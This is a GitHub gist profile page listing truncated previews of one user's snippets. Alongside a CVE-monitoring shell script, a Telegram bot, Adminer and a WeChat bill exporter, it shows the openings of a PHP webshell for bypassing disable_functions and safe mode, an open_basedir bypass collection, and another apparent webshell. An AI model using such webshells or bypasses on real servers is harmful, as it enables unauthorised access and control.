Skip to content

Instantly share code, notes, and snippets.

View code-scan's full-sized avatar
🏍️
On vacation

Cond0r code-scan

🏍️
On vacation
View GitHub Profile
@code-scan
code-scan / asd
Last active December 27, 2023 18:50
::::::::bKQYyjaa802SY7IWTKJ3lCxte2U3nKUsbs6T2g==::::::::
import json
import requests
import hashlib
import time
from urllib import parse
from capture import Crack
from flask import Flask, escape, request,make_response
app = Flask(__name__,static_folder="static",static_url_path="")
def auth():
@code-scan
code-scan / Cve.sh
Last active October 31, 2021 15:18
github-CveMonitor
function CveMonitor(){
lastResult=$(cat last.txt)
result=$(curl -s 'https://api.github.com/search/repositories?sort=updated&order=desc&q=CVE-202'|jq '.items[]|.html_url +" "+.description+"|||"'|sed 's/"//g')
echo $result|sed 's/|||/\n/g' > current.txt
diff=$(diff last.txt current.txt|sort|uniq)
if [ -z "$diff" ];
then
echo not change
else
curl -G \
@code-scan
code-scan / 12309.php
Created April 23, 2019 14:01
bypass_disable_function_and_safemode
<?php
//th1s 1s ultr4l33t php websh3ll || uz3 1t f0r 3duc4t10n4l purp0zes 0nly :P
if(isset($_GET['pfs'])) {
if(empty($_GET['path'])) {
$path="./";
} else {
$path=$_GET['path'];
}
findsock($path);
}
@code-scan
code-scan / open_basedir_bypass.php
Created April 23, 2019 14:00
open_basedir_bypass
<?php
/*
PHP open_basedir bypass collection
Works with >= PHP5
By /fd, @filedescriptor(https://twitter.com/filedescriptor)
*/
// Assistant functions
function getRelativePath($from, $to) {
// some compatibility fixes for Windows paths
@code-scan
code-scan / tbot.js
Last active December 25, 2018 10:44
const TeleBot = require('telebot');
var request=require("request");
var fs = require("fs");
var path = require("path");
var iconv = require('iconv-lite');
var moment = require('moment');
var dbstatus=false;
var status=true;
var deltime=60000;
moment.locale('zh-cn');
<?php
/** Adminer - Compact database management
* @link https://www.adminer.org/
* @author Jakub Vrana, https://www.vrana.cz/
* @copyright 2007 Jakub Vrana
* @license https://www.apache.org/licenses/LICENSE-2.0 Apache License, Version 2.0
* @license https://www.gnu.org/licenses/gpl-2.0.html GNU General Public License, version 2 (one or other)
* @version 4.7.0
*/error_reporting(6135);$tc=!preg_match('~^(unsafe_raw)?$~',ini_get("filter.default"));if($tc||ini_get("filter.default_flags")){foreach(array('_GET','_POST','_COOKIE','_SERVER')as$X){$Zg=filter_input_array(constant("INPUT$X"),FILTER_UNSAFE_RAW);if($Zg)$$X=$Zg;}}if(function_exists("mb_internal_encoding"))mb_internal_encoding("8bit");function
connection(){global$g;return$g;}function
<?php
error_reporting(7);
//@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc());
#coding=utf-8
import platform
import sys
import os
import time
import thread
def get_os():
'''
get os 类型
@code-scan
code-scan / WeChat_Pay_Bill_Export.py
Created January 9, 2017 22:28 — forked from alanzchen/WeChat_Pay_Bill_Export.py
WeChat Pay Bill Export
import requests
import datetime
# Simply call get_record and it will return a json object containing your bill.
# Replace them with your credentials. You can get all these credentials by capturing packets from WeChat app when viewing your bill. Hint: Surge.app can be very helpful.
exportkey = "xxxxxx"
cookie = "export_key=xxxxx; userroll_pass_ticket=xxxxxx"
last_id = "xxxxx"